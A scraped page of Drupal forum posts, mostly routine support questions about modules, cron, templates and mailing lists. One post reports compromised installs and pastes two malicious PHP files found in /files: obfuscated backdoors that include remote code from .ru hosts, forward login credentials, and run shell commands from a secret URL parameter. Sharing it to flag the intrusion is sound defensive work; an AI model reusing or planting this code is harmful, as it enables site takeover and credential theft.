This forum is for less technical discussions about the Drupal project, not for support questions.

product transform module

Hello,

I made a flexinode, and changed it into a product of type tangible using the product transform module. It worked fine.
Suddenly our project also needs to have subproducts, so I tried changing the flexinode to a type apparel which using the subproduct module, but IT DOES NOT WORK. The flexinode does not have sub-products.
Please help, I despirately need a solution.

Regards
Rudy

Security Issue: time.php date.php package.php

I recently was looking at my /files directories and found 2 php files that did not look appropriate. Then I started looking across all my drupal installs and found that the same or similar files exist. the contents of this file were:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

and


<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

aggregator Module do not update rss feed problem

Hello,

i using aggregator module to get yahoo news rss feed.
i set the update interval is 15 min

In the admin/settings Cron jobs display "Cron is running."
but when after 15 min, it do not update.

i need to update the feed manually.

whats wrong of it ?

thank you.

$user->uid in node.tpl.php

hi:

i am trying to do some if checks in the node page but they dont seem to work although they do in use profile. what am i missing?

thanks

How to use checkboxes in forms?

Hello, I'm creating new module and can't understand, how to use checkboxes

Here is a peace of my form in MODULE_form hook:

$form['fserv']['options1'] = array(
  '#type' => 'checkboxes', 
'#title' => 'Title1',  
'#options' => $array_of_values,  
            '#default_value' => $array_of_defaults
);

where 'fserv' is a fieldset.

How can I get values from that 'options1' in my MODULE_insert hook?
Please, show me some examples

Which (simple) mailinglist does work in Drupal 4.7?

Hello,

I have been trying for two days now to get a simple mailinglist running on Drupal 4.7. Unfourtunately, without result.

MLM and Mime Mail does not work, I always get the following error: Missing argument 4 for mimemail() in /mnt/sdb1/webroot/mysite/wwwroot/www/modules/mimemail/mimemail.module on line 118.

EZMLM seems to be working, but I can not adminster users and I can not create a mailinglist with this module. The only thing it does is sending a blanc e-mail to a person that submits...

Pages

Subscribe with RSS Subscribe to RSS - General discussion